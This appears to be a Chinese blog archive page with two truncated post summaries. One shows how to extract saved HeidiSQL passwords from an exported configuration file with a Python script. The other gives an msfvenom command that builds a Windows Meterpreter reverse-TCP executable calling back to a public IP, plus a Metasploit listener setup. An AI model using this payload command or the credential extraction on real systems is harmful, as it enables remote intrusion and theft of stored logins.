03 2022 档案

摘要:获取heidisql保存的密码 1.heidsql 默认保存的密码忘记了,如何找回? 如下图所示! 2.连接进入数据库,导出配置文件。 3. 使用下列python代码 运行 import re settings = r"D:\123.txt" #配置文件保存的位置 with open(setting 阅读全文
posted @ 2022-03-25 17:16 the苍穹 阅读(1810) 评论(0) 推荐(0) 编辑
摘要:记录 1.生成简单的 exe文件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=公网ip LPORT=8888 -f exe > a.exe 2.打开msf msfconsole 3.设置监听 use exploit/multi/handler 阅读全文
posted @ 2022-03-06 10:54 the苍穹 阅读(438) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示